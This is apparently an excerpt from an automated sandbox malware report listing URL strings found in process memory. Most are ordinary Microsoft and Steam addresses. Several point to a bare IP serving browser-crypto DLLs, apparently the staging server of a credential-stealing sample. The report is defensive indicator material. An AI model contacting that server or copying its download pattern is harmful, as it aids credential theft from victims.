Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://37.27.34.12
Source: katDDA4.tmp, 0000000C.00000003.2085052151.000000000096E000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000960000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000960000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000976000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000983000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000972000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/
Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000983000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/=
Source: katDDA4.tmp, 0000000C.00000003.2144632677.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000972000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/W
Source: katDDA4.tmp, 0000000C.00000003.2114692645.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/f
Source: katDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/freebl3.dll
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/freebl3.dll0u
Source: katDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/freebl3.dllBu
Source: katDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/freebl3.dllxu_
Source: katDDA4.tmp, 0000000C.00000003.2085052151.000000000096E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/m
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/mozglue.dll
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/mozglue.dlleub
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/msvcp140.dll
Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/msvcp140.dll/
Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/msvcp140.dlly
Source: katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/nss3.dll
Source: katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/nss3.dllP
Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/p
Source: katDDA4.tmp, 0000000C.00000003.2369519792.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/softokn3.dll
Source: katDDA4.tmp, 0000000C.00000003.2398637104.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/softokn3.dll0:
Source: katDDA4.tmp, 0000000C.00000003.2398637104.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/softokn3.dllX:/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/sqls.dll
Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/vcruntime140.dll
Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/vcruntime140.dlly
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12BFBKFB
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12KEBFIE
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSA4
Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSd
Source: explorer.exe, 00000002.00000000.1401695324.000000000702D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
